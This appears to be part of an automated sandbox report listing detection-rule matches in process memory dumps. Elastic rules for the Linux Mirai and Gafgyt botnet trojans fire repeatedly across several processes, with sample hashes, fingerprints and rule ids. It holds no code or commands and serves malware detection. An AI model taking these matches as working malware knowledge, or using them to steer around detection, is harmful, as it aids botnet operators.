Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
